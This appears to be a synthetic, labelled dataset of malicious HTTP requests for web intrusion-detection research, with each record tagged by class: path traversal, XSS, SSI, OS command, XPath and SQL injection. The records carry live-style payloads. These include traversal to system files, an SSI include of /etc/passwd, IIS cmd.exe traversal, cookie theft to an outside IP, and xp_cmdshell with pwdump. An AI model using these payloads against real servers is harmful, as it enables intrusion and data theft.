User-Agent: Mozilla/6.0 (compatible; ncaZt; Solaris; dai0diB0o; 9raptd)
Transfer-Encoding: compress
Warning: 463 www.ylhdoks.gif "acxgsorD4dd" "Thu, 30 Nov 06 07:19:18 CET"
----: --------------------

arclbi8ee=2973632&a6pdaitn=533779

End - Id: 40224
Start - Id: 45438
class: PathTransversal
PUT /hcfvxC/r83b5tNZ@40Xz_SNs/_R980ENWLV/cWLPOselectXexecnW/iSk_0sI7I0H0VKGGTS/te/r1uLP@FUrR8Jh@tQX7fW/qIlMhPFR.asmx? HTTP/1.0
Content-Length: 317
Content-Language: mimF
Content-Encoding: gzip
Content-Location: /wsesi/eensapj/8mithvu/8skr/cltlAcrq.asp
Content-MD5: bndPd040bjNJdnN0dDFFZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Aug 06 22:39:23 UTC
Host: www.eesu.fr:35997
Connection: close
Accept: application/postscript;q=0.4, video/*, video/*;q=0.6
Accept-Charset: windows-1252;q=0.4, iso-10646-ucs-2;q=0.2, x-mac-chinesesimp, windows-1253, windows-1253;q=0.4
Accept-Encoding: gzip, deflate
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 112.92.61.252
Cookie: jdkeIyEtSislcS=t8|;ds=hoxhonullt nupdatehttpe10gar ;hAxqeh9en=9k-psev+ t;JzgKdVdbC=zh_C22W3-I.0;miehlubhaeE=04;HwPNoe=52
Cookie2: $Version="71"
Date: Sun, 29 Apr 07 04:52:58 UTC
ETag: "cWVaQKspJRouILSecHXU"
Expect: 100-continue
From: uhh0h@xsnes.uk
If-Modified-Since: Thu, 11 Oct 07 06:38:37 CET
If-Unmodified-Since: Sat, 04 Apr 09 19:38:07 CET
If-None-Match: *
If-Range: *
Max-Forwards: 4382
Referer: http://www.etoeoE.com/dBenea/1rNghre/ebtcik.pdf
TE: trailers,chunked;q=0.4,chunked
Trailer: TE
User-Agent: Mozilla/2.2 (Windows; U; Win 9x 2.3; n2-wB; rv:6.3.5) Gecko/37350322
UA-Disp: 6378,1062,32
Via: 6.2 www.ceool.css, 3.8 51.165.173.215
Transfer-Encoding: deflate
X-Forwarded-For: 173.42.173.213
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

jrxsts=gka6nmfm:9io =-/&oteftilsaeradt=r0osetw&sr5aae=htDocstaol&-h-fe=>ne=i3teatcns&fzaaom7thhs=ttgoieJ5sbrxdni&2ussm4eed=isBgEwA2w&ue1s6orrl=\autoexec.bat&kDwindow.open_9qJS=2t<tconnectu5osmg/a%uas$&ad5orau3tsjeh=2\r~&2t=eam&AHtd=Szn&Ip1nnrn=e&tRTsKuFKc=05&xM-aechoWzi3pI=3rde&OA.2NaHzSl=612

End - Id: 45438
Start - Id: 36056
class: PathTransversal
GET /eI2-rOl-r3w1-/pVeyP7/eEPx@qLa/n0td5J/kt/bp0jguibimcaara/6YKaCmnXDp/i8SR2VyYff5zcE/olnPp4BO2Iufkc4o/lk3ZwojvHoNeJSZck2/igGLyLZYHCaw@Ub./hXaoA3sT.swf?robvt=387&zv8ym=%26mgH&tmpwRtxml0Y=41709749&dgeeen43sneOl=iT+c&retereah=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Feser%2Flesedeensi%2Fng%2Fties.bin HTTP/1.0
Host: 207.125.29.205:73
Connection: ngtd8y1
Accept: video/*;q=0.5, text/plain, video/*
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=496
Client-ip: 158.196.17.85
Cookie: anreEmnBi=sK9jACM;eYsl=iaccept;tiaRahhlA3llma=e7.;U6NC8tmp0x2Q5=|echo5I rlikeqgroup bynj h%ed;ztdcov=3;iRml=a1Ji8QUR
Cookie2: $Version="12"
Date: Sat, 25 Sep 04 02:00:43 UTC
ETag: W/"uHw4nlcHQ8W74qHyy"
Expect: 100-continue
From: Odatte@nazuaen.net
If-Modified-Since: Fri, 09 Jun 06 04:35:55 GMT
If-Unmodified-Since: Tue, 27 Oct 09 15:27:39 UTC
If-Match: "gmE.laLeS_yOTUER8v"
If-None-Match: *
If-Range: Sat, 09 Jul 05 05:44:32 GMT
Max-Forwards: 76
MIME-Version: 5.0
Pragma: ti0='t'
Proxy-Authorization: Basic YndzbHRvOmVuRWZodHM=
Authorization: sesr dyand1=Ihe1t
Range: -676,1810-88717,49-
Referer: http://ethumasu.fr/aoutrs/3eEl/ptfCma/ro7h/s6vni.gif
TE: gzip
Trailer: Warning
User-Agent: oo4t7tsedkcpci
UA-CPU: x86
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: 2.3 8.9.78.53:22, HTTP/0.0 252.195.190.33
Transfer-Encoding: eare
Upgrade: ia1tsT/0.5, s0tear/3.3, emk/4.1, teba/2.1, nt5/9.5
Warning: 919 47.112.49.170 "uvicSPonns9rssR" 
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36056
Start - Id: 46496
class: XSS
GET /<SCRIPT>/? HTTP/1.0
Host: 97.132.178.149
Connection: efWipxh
Accept: text/*;q=0.2
Accept-Charset: windows-874;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.7
Cache-Control: max-age=43417
Client-ip: 219.134.80.54
Cookie: at4a=93;0-esystem-vkincludeC=239;h3uneiOrir=H-%
Cookie2: $Version="5"
Date: Sun, 22 Apr 07 23:43:02 CET
ETag: "pjlnXx9p-jlmpT@5"
Expect: ninwdknn
From: musoa@e4qteeenfg.net
If-Modified-Since: Mon, 09 Oct 06 08:36:52 CET
If-Unmodified-Since: Sat, 23 Feb 08 14:10:27 UTC
If-Match: *
If-None-Match: "W5fHifN204xHZvD_Cooi"
If-Range: "-j9OI@AIkxXhBo86PRq"
Max-Forwards: 24
Pragma: ofewdi5e='hceanw'
Proxy-Authorization: Digest qop=auth-int
Authorization: nmrxce g3oyi=r4te
Range: 8-112855,2026-165541
Referer: http://www.nbeAnog.biz/ashdl6/5onmtf/CHeoehw/exlmuUt.gif
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/6.3 (Machintosh; U; PPC Mac OS X 3.8; 3e-it; rv:8.9.7) Gecko/43928826
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 139x000
Via: 7ivmxe/2.5 www.6amie7.png, 7.5 www.antnn.gif, otrygw/7.4 122.239.150.30
Transfer-Encoding: otsn; troe=con6a
Upgrade: us6nre/1.5
Warning: 000 30.27.133.227 "nEecyFef" 
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 46496
Start - Id: 45711
class: PathTransversal
GET /aKsDNamRy/oyc@TdHRlyXlmtu0kV/nOSxs6T3bg/tAX3meta/ln/mHW/sUO0r3.0AV0d@EO/gnr7gnmnLss0e/eOpataoz5th5abct/o@eazbMzHyl.bin?o3euOeitj=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&RUqn=%40&6Tyisdhmasco4=n4seF&OCupdategjLAacceptyp65=3rteno+s&9nnsaon6e=+&vanro1=iacwi2execfQl&mryh2=rhcd2dolennEe&r9mrylohiGEwtol=6f_tiiKG HTTP/1.0
Host: 100.57.157.187:4364
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 246.116.135.101
Cookie: hlhoiselfi=aCEr1cngms;uptwsj0maE=061893874
Cookie2: $Version="0"
Date: Wed, 05 Jul 06 05:18:29 UTC
ETag: "W2cyccIkLZi2-vmxGbfE"
Expect: 100-continue
From: gAo4ot1@1soairea.gov
If-Modified-Since: Sun, 28 Jun 09 16:37:55 UTC
If-Unmodified-Since: Tue, 22 May 07 05:53:57 CET
If-Match: "ZojJVRHN_cbUR4nPA1"
If-None-Match: "uCmYFFYx004KMs_I-TE"
If-Range: Sat, 19 May 07 22:51:51 UTC
Max-Forwards: 1
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM SW5uZWRjdHRwZGlvcm9uYWVkYXdtYXQ5cE9tRGF4QmRFcnJzaTRyanRyYzVpMg==
Range: 8441-
Referer: /otuevkso/lthte/3a3eroc/rit4pwy.php3
TE: trailers,chunked;q=0.3,trailers
Trailer: Cache-Control
User-Agent: Mozilla/4.9 (X11; U; SunOS sun4u 1.1; ts-td; rv:2.4.3) Gecko/81520131
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 967x7308
Via: HTTP/8.6 www.rr8w.css, 0.1 186.99.51.155
Transfer-Encoding: 0tlo
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 140.86.158.94
X-Serial-Number: 1618317
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45711
Start - Id: 39538
class: SSI
PUT /wzseonx/X8/nF/ttngg2i/nciesnjaHTahin/ktneultt/ti8/jzDZYGHT9_YpBTx5fn8/mz.shtml? HTTP/1.0
Content-Length: 90
Content-Language: iic
Content-Encoding: compress
Content-Location: http://qeniGri2.de/alei/jgsm/oesieeih/sluel/emta.dll
Content-MD5: ZXRZbmVhMG9tb3RyOHNubQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 07 Jan 06 12:10:21 CET
Last-Modified: Thu, 07 Feb 08 20:18:17 CET
Host: 158.251.128.11:33071
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: isiri-3342;q=0.4, iso-8859-6;q=0.7, iso-8859-8;q=0.5
Accept-Encoding: deflate;q=0.3, identity, identity, gzip, deflate
Accept-Language: zcsgbr-tit9tec, sirhfsE-rdf;q=0.7, hyolsu-ittple
Cache-Control: only-if-cached
Client-ip: 94.165.84.44
Cookie: oienetgeNcA=9009;nonsteerihg=trnfov/d1eid|osl ;netcatXvbscriptRM2U.-=eFBix7A5p@;eflitd5mosgHU=8132176017;viseurat=sp9ebrOtseibnwehs
Cookie2: $Version="126"
Date: Sat, 30 Oct 04 08:44:01 UTC
If-Unmodified-Since: Mon, 25 Jan 10 06:10:34 UTC
If-Match: *
If-None-Match: "z_WqrVPxaVLaOMQiA"
Max-Forwards: 8
MIME-Version: 5.2
Proxy-Authorization: Basic Vm5zcmFwOjI2aWtvc2Q=
Authorization: NTLM c3M1ZW8ybGw4b296eG5pZWxhc2xhbGFvTmdxdGFsZWV1Z2xkbnNyaHJucg==
Referer: http://www.dssh.uk/tkejW/Toin/husm.tiff
TE: deflate,trailers
User-Agent: Mozilla/5.8 (Windows; U; Win 9x 4.8; cs-8e; rv:2.6.2) Gecko/28203098
Via: 4.6 74.194.196.103:79795, 3.3 1.66.117.79
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 494 189.159.212.31 "fthMulr0sla" 
----: ----------

ptwiypd=<!--   #include   virtual="/etc/passwd"   -->&sox=sftHjdg&h0=edl

End - Id: 39538
Start - Id: 44966
class: PathTransversal
GET /o4v7xtnIytuOmooxacr/lgYedbkXgdk7O@/L70aC6/weoresrehxGhbeyytaD/no.vKBaJTgKQ_TLTxzm/f-K.yqM5zAG8Hbv/usohofdhstembeo/b5MRwUb05026/iytdest22halrvnT6/iuwh/ccJMc/hsjeglsyStyahea.shtml?Seue=9055136&70usrGl1zGNQ=processing-instructionS&bamrrUeetiiO=doc%28file%3A%2F%2F%2Fc%3A%2Feen%2Fhkj.xml+%29 HTTP/1.0
Host: 60.19.187.96
Connection: lTFeicv
Accept: video/*, text/html
Accept-Charset: *;q=0.6
Accept-Encoding: deflate;q=0.1, gzip;q=0.2, deflate;q=0.4, compress;q=0.9
Accept-Language: *
Cache-Control: vas='i'
Client-ip: 141.6.207.75
Cookie: btz=998;ri29itqihAelex=723979;eo=9;Nhr0doaddeseokn=8selreeesetssc
Cookie2: $Version="7"
Date: Mon, 15 Mar 04 24:40:18 UTC
ETag: "DxdmIH82T-DvjMGvlJt"
Expect: SkhguTri
If-Modified-Since: Mon, 07 Sep 09 07:41:47 CET
If-Unmodified-Since: Tue, 05 Jul 05 10:25:31 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 28 Mar 07 11:34:01 UTC
Max-Forwards: 3398
MIME-Version: 0.8
Pragma: a41wY7i='E'
Proxy-Authorization: Digest username="eaorh"
Authorization: wahscE w1funtlr=bta3
Range: -972278
Referer: /t9i1eq/6lh1Chen/tiath.pl
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: dQ4Ylh9vM http://www.tewxaaw.be
UA-CPU: Sparc
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: 1.0 16.3.246.115, FTP/1.4 www.muc4tsEs.htm
Transfer-Encoding: hatutt
Upgrade: tOgk/7.2, 57lv/3.4, zpxc/7.9
Warning: 869 39.20.119.131 "cruietilr4eat3pmses" 
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 9376895954650597
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44966
Start - Id: 47783
class: XSS
GET /CiU8C/i97M8f_mF34/jFYfHmIxpTo/sdhRT.5.TAie%uoptv/earksyerRtmspeonu/sSKancQA/dcle/rA/xRu0apkOzBAdvz.shtml?equh=7918461&TsMiwntti76=tunaetutl7&xelinayupaut=rF9uEZe3&SCXYetcg-QG=%3Cxml+src+%3D++++%22+++javascript%3A++%5Bwindow.open%28%27http%3A%2F%2F83.189.61.86%2Fnsti.dll%27%2Bdocument.cookie%29%3B%5D%22+%3E&tuxet=734731&A1mu6GKD6gU.=ie+1&r2e=utm HTTP/1.0
Host: 253.131.235.141:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: utf-7, windows-1258, isiri-3342, windows-1257;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 226.38.61.226
Cookie: egn1hliaee=uyivht9ahiIia4;iGmHo=snDbnrdm
Cookie2: $Version="908"
Date: Tue, 13 Dec 05 24:33:33 GMT
ETag: W/"24PXDJcX3yUAeSMko"
Expect: tese=ojdN1;xeEsf
From: ychumrg@eeAsehi.cz
If-Modified-Since: Sun, 11 Jan 04 10:47:39 UTC
If-Unmodified-Since: Wed, 02 Sep 09 10:42:19 CET
If-Match: ".n_IwtoIzSGxgY7"
If-None-Match: "58MJ1jIeIYKqDDZ5pe9"
If-Range: Fri, 09 May 08 03:24:48 GMT
Max-Forwards: 25
MIME-Version: 8.5
Pragma: t7=x7
Proxy-Authorization: NTLM cmFDc25ub2lJdW5vaGZvaXRpb3V3cmRkbmRnOGxXYVNvY2VtZWYz
Authorization: Basic dGlZaTZSejpldG80aG5w
Range: 9830-
Referer: http://www.pl8egi.st/N5It/xisgroa/c68a/dmir/4aat.php
TE: chunked;q=0.0,deflate;q=0.1,trailers
Trailer: Accept-Language
User-Agent: la68nN http://www.5luu.cz
UA-CPU: PowerPC
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7737x1025
Via: 2.2 241.126.131.208, 0.8 244.2.239.102:70
Transfer-Encoding: onrchn; lsJnsa=0uy1oih
Upgrade: zbercb/3.5, lhe1/8.6, HsR/8.3, ne6enE/3.6
Warning: 119 www.u4avcao.jpeg "eaDh3tssiseettoa2" "Mon, 21 Aug 06 21:05:07 UTC"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47783
Start - Id: 39399
class: SSI
GET /ih9sb/nb/JHKz.JplikeJZ-/lMvWnJil_CSxOSYG3LxK/emtkrnsdesOweehI9i2.php3?sn7a4e2cho=npf&2lboqjnho=23&htl1sneoogo2et=6012698&5ebyfstn=1800&xT@7L=874&2Aatiea=tedsbayet6e9ahevaz&nshnta4t3riai=%3C%21--%23email+fromhost%3D%22www.jongCu.com%22+tohost%3D%22mailbox.qeo.com%22+message%3D%22rroa+t1pb4ht+ndeld+ei0oxT%22+fromaddress%3D%22a3it.com%22+toaddress%3D%22ohml.ero1.com%22+subject%3D%22ron%22+sender%3D%22ijs4.com%22+replyto%3D%22sn9ay.com%22+cc%3D%2275R%22+inreplyto%3D%22lo+4va+t%22+id%3D%22efNmail%22+--%3E&ttoaeahThetsmo=doptr&ancoetntp=1500024 HTTP/1.0
Host: www.etsiluroe.gov
Connection: close
Accept: video/quicktime;q=0.1
Accept-Charset: euc-jp, iso-8859-3;q=0.5, iso-8859-2, iso-8859-4;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=62
Client-ip: 39.14.204.79
Cookie: gPtogetiro3zrmy=ialsam~ihtp L prns4R 
Cookie2: $Version="246"
Date: Tue, 28 Mar 06 09:33:05 CET
ETag: "4Brn_CPTrEZ4KqY"
Expect: 100-continue
From: gdiexzng@dnnsS.com
If-Modified-Since: Fri, 25 Apr 08 12:14:40 UTC
If-Unmodified-Since: Wed, 28 Jun 06 03:03:52 UTC
If-Match: "PS@@C1Y8FtZUzBn"
If-None-Match: *
If-Range: "VLbQthvGU8ZsK188"
Max-Forwards: 500
MIME-Version: 4.0
Pragma: hph1n98=raka276c
Proxy-Authorization: reenr ueer=altyt2
Authorization: Basic ZWVhMjluOmV3Tm0=
Range: 32-500
Referer: /domt/nanoke5/sdntats/anos/i76ts7.swf
TE: chunked,deflate,deflate;q=0.2
Trailer: Accept-Language
User-Agent: Mozilla/1.1 (Windows; U; Win 9x 6.7; sy-tc; rv:8.2.0) Gecko/21291136
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 696x8409
Via: 6.3 238.192.7.253, HTTP/7.8 www.tOargdE.jpg, 5idp/7.2 100.159.27.248
Transfer-Encoding: compress
Upgrade: swa/3.2
Warning: 190 www.twedsrAa.js:13 "LwwoTeugDami" 
X-Forwarded-For: 193.181.203.122
X-Serial-Number: 25787238
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39399
Start - Id: 43343
class: OsCommanding
GET /loe6gisein/sbtbesDs/aEqWfe8.9LQX1O.htm?raht=%5C%22%5C%3B+++++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+www.tantinestola.com++++89081%5C%3B&gwdtkIgcoIt=%248stoe%5C1iti%7Esa%26 HTTP/1.1
Host: 76.202.33.98:80
Connection: close
Accept: video/*, video/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 39.142.10.38
Cookie: fe=84109413;ihuena2i=0659125
Cookie2: $Version="732"
Date: Thu, 10 Jul 08 03:00:21 UTC
ETag: "ZtsaybANwxvciPTcmh"
Expect: 100-continue
From: tz687o@hnoaaeiE.it
If-Modified-Since: Sat, 31 Jan 09 10:10:29 CET
If-Unmodified-Since: Sat, 12 Feb 05 03:01:04 GMT
If-Match: *
If-None-Match: *
If-Range: "vCmxuZTe68mBfpLsJHb"
Max-Forwards: 125
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest nc=0dbF188e
Authorization: desngn piBmna=tHse
Range: -3
Referer: http://uetn1ws.be/bwplx/b44ioast/kd9rlfn.swf
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/2.7 (Machintosh; U; PPC 2.2; 50-iz; rv:8.6.9) Gecko/79820196
UA-CPU: 68000
UA-Disp: 061,373,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 331x628
Via: 5.3 www.wtrct.html, 5.2 8.151.16.225
Transfer-Encoding: gzip
Upgrade: kxea/4.4, ru5/6.4, ttftd/1.9
Warning: 673 www.eotg.jpeg "ttFtvipf" 
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 3733669583698502
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43343
Start - Id: 43843
class: OsCommanding
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.pi2mt.cz:3
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-874
Accept-Encoding: deflate
Accept-Language: fo-wahis, 0uecs-nsZshe;q=0.6, eeospl-1n9sw;q=0.8, in-i0s;q=0.7
Cache-Control: no-transform
Client-ip: 34.114.34.166
Cookie: FHPs=9323450;iaimsiRhoho=m@C-p6;@b3TX_E_Ay=ipGvAcDdDbHP
Cookie2: $Version="8"
Date: Fri, 25 Apr 08 23:40:16 CET
ETag: W/"mBNr4uKR@28Nw127ZHvC"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Thu, 06 Nov 08 24:34:59 CET
If-Unmodified-Since: Fri, 19 Jun 09 13:22:59 UTC
If-Match: "irp1IvVnJAT7@cT"
If-None-Match: "Z78AdnrM@.z.am-"
If-Range: Tue, 13 Mar 07 02:44:46 CET
Max-Forwards: 9
MIME-Version: 1.9
Pragma: aeriel='oyet9ss'
Proxy-Authorization: Digest uri=/Ieiete.jpg
Authorization: Basic YXJvbmU6Y3QwdHRv
Range: 064373-124259,214-265,801-679
Referer: http://www.ptnamnjs.gov/nehtn/3bht/s6tn.rar
TE: trailers
Trailer: Accept
User-Agent: Mozilla/2.5 (Windows; U; Win 9x 0.6; et-r0; rv:1.9.7) Gecko/67907218
UA-CPU: PowerPC
UA-Disp: 431,094,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 629x1097
Via: FTP/4.8 www.hAhbihn6.jpg, FTP/8.9 www.dErseaoi.gif, 7.1 www.akdpg.htm
Transfer-Encoding: compress
Upgrade: hnohEn/1.3, he2eEw/1.1, bncL/6.8, m2jzg/1.9, jtxSa/2.3
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43843
Start - Id: 49997
class: XPathInjection
PUT /@AmnD6Beimgz/m83uuyTMSLjC/tgDsQCnuL/qk/etmrefeliwiAe/o6vLw9K4C.Xr/ijWxVHwXT7M/nnDqtnredteetr/r_/nhamlseog44uL9mtcoh/eqL@29GykN5/e9U.oGDeYhKMsnGC.asp? HTTP/1.0
Content-Length: 59
Content-Language: 3aaE,iesro,d4i8twa
Content-Encoding: gzip
Content-Location: http://www.isfd9a.cz/Orsicnpe/2aTneen/imne.mpg
Content-MD5: OHM2dGRjT2l0MmZrb2lVdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 19 Feb 05 09:24:08 UTC
Last-Modified: Thu, 04 Feb 10 17:30:08 CET
Host: www.hpesb87.fr:671
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: big5, iso-8859-6, iso-8859-8;q=0.2, iso-8859-5;q=0.1, x-mac-ce;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: 4usEo-nkdmnLt;q=0.2, jer-ecwresu;q=0.4, qrsTHrLm-ds;q=0.5, f-anhenc;q=0.8, pdejh-tdsaieri
Cache-Control: utitw='8ukpk'
Client-ip: 89.188.193.205
Cookie: ysrtt=eHpVXbFXm;5uovi8Sul1mChci=4;WNf9Oq7b3-C6=7
Cookie2: $Version="99"
Date: Wed, 28 Apr 04 14:44:24 UTC
ETag: "TUj8p7dHypWCUyG29"
Expect: 100-continue
From: etjd@onalE.be
If-Modified-Since: Sun, 14 Dec 08 12:30:49 GMT
If-Unmodified-Since: Sun, 01 Jul 07 13:18:09 GMT
If-Match: "X_JEa3J6PrqCTWOqUg"
If-None-Match: "4gT2GXKYQ3w0O0gIpCdX"
If-Range: Sun, 24 Sep 06 13:07:38 UTC
Max-Forwards: 7128
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: egErr TfEaua=iOrh
Range: -850,-93,-844
Referer: http://www.racrtoze.net/hhbql/dwtgve/a1ths.cfm
TE: deflate
User-Agent: 2n' or     eu/balyje/child::node()[processing-instruction()=25]  or 'eimr' = '
UA-CPU: x86
UA-Disp: 5539,6840,32
UA-Pixels: 957x1532
Via: FTP/9.8 191.115.53.215, 4.9 www.tsHe.js:706
Transfer-Encoding: compress
Warning: 252 180.24.75.159 "hsne9Zmnmn5s" 
X-Serial-Number: 7920080126086879316
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

Eee8adrtto=uews1ms2eUoi&frdot=eiEyumde8tsd/ &ohaod=iroh7t

End - Id: 49997
Start - Id: 42611
class: SqlInjection
GET /h.GVFtP@o/fnEdt6/iweaDhjt6sus.nsf?JraSKpIfandu.B=to%2Fd3%27idc+&6foRNitd=02&cmeaOwAg4cepte=O4&auetEpaivtk6i=5119&sssuetlr8qatte=asdt5&a7qleupnoetc=inwsimS8eNinSayn&Oo=%7Eod+rnineonodeNs&e0We=%3B++++select+++*+++from+++++OPENROWSET%28++%27SQLoledb%27%2C%27uid%3DtglLnza%3Bpwd%3Du4dgw1srr%3BNetwork%3DDBMSSOCN%3BAddress%3D174.20.210.70%2C55498%3B%27%2C%27select+++*++from+roSisdpzk%27++++%29&upAoaaqii=298&oenhi7ro2e=h+H+ptletpp7-Iy%3Bt&sebe3w8imiSjl=0&rceesigehXlLl=%40oign5S&mcoy9whm=sh%7Cee&NdaxnDxriAb=053809443&tPmo2nea1r=da%2F HTTP/1.0
Host: 70.204.120.234
Connection: keep-alive
Accept: image/*, application/rtf
Accept-Charset: x-mac-japanese;q=0.3, iso-8859-7, iso-8859-8-i, euc-tw
Accept-Encoding: *
Accept-Language: dhgeteh-obfRi;q=0.8, H-jfoId, yr-atyisYs
Cache-Control: no-transform
Client-ip: 105.113.178.254
Cookie: ayqi0m=a3~ d;1qrn=rvZarj3vkgG
Cookie2: $Version="901"
Date: Sun, 15 Feb 04 07:45:21 UTC
ETag: W/"dDx574vQD5EHg8r83RQ"
Expect: t9eEetml=oiti
From: Ttm5ttN@Sin1.net
If-Modified-Since: Sun, 11 Mar 07 20:47:01 GMT
If-Unmodified-Since: Sun, 02 Nov 08 24:08:55 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Jun 04 03:46:25 UTC
Max-Forwards: 8
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest uri=http://c7pehg.gov/wlTmc5eu/2Atai/meaa/st4lt/bneleeEA.fgf
Referer: http://h3otEe.be/Nrxebe/4lcn/ldoeiO/paed/vnhx.swf
TE: trailers
Trailer: Warning
User-Agent: omxhdblec/0.9.1
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Win95
UA-Pixels: 4720x346
Via: HTTP/9.0 www.amwh.js
Transfer-Encoding: compress
Upgrade: tTeemn/3.0, mb5/6.3, ezf/4.1
Warning: 729 www.otcoid.tiff:28507 "rzihggorRptsfrvcprf" 
X-Forwarded-For: 32.163.55.249
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42611
Start - Id: 41134
class: SqlInjection
GET /Uoyaesbtpoe/la5heEoliueTgasoh/atenh6aro/o6nnmuueus3t/9WehiXxtermkolibconnectju/bl7saENnidte/u97RX/7usr/iDjsn0e/xlmey5ket4.jpeg?hrea=2&esre5atss2s=05623&eet=n+y%3Ft&eoc=oCXVRrOETD&ndOytN7t=exec+xp_cmdshell+++%27bcp+++++%22select++*+from+++itE3ta%22+++++queryout+++++pwdump.exe+++-c++-Craw+++++-Shackersip++++-Usa+++++-Ph8ck3r%27&cnqe=re2l3o4&xoPhro4ieliT=l5qldrCtq&@06oo5access_logpiDiQ=Uitl&nnbnadanadasa8n=e1bsetEaacs%3Ae&oYte=yaluf34igr&nctshfte5idtn=wb0kaSsJk&irblnaxhole=qO&unect7ln=ehvhxwdc&aehnoos=205205 HTTP/1.0
Host: www.trtleItst.it
Connection: keep-alive
Accept: video/*;q=0.6, image/*, audio/basic;q=0.9
Accept-Charset: x-mac-ce, iso-10646-ucs-2, euc-kr;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=99636
Client-ip: 225.169.58.33
Cookie: gNhCqt2divshutdownVDO=ne5eaia5is6ricyr;tfssdniewbeg=ees(g eval/r;zyF1sm1J7=reelA\n;tu=Mre;lhRmm=sS84pn;b5b0TUat=gnxAOJrt8
Cookie2: $Version="318"
Date: Sat, 15 Dec 07 10:29:24 CET
ETag: W/"VyKWI0nTnYyfdWi-YLN"
Expect: mauisrt=tgnoooe
From: r3rduu0D@aEtfemeowc.cz
If-Modified-Since: Tue, 03 Aug 04 04:53:38 GMT
If-Unmodified-Since: Fri, 04 Sep 09 19:00:24 CET
If-Match: "@OvZOKpmLqwcNPhkkJu"
If-None-Match: *
If-Range: Sun, 02 Nov 08 07:54:09 UTC
Max-Forwards: 6451
MIME-Version: 9.5
Pragma: tb1etra='teGtMR'
Proxy-Authorization: odibel 3arthngL=ngnhea
Authorization: iKoea hinaasI=nuum6mc
Range: 47372-1187,76948-,4440-295
Referer: http://www.yees.org/tcN1os/raenhd/ietyM.jsp
TE: gzip;q=0.8
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.6 (compatible; Konqueror/5.9; Mac OS X; eemle; Naa6sK)
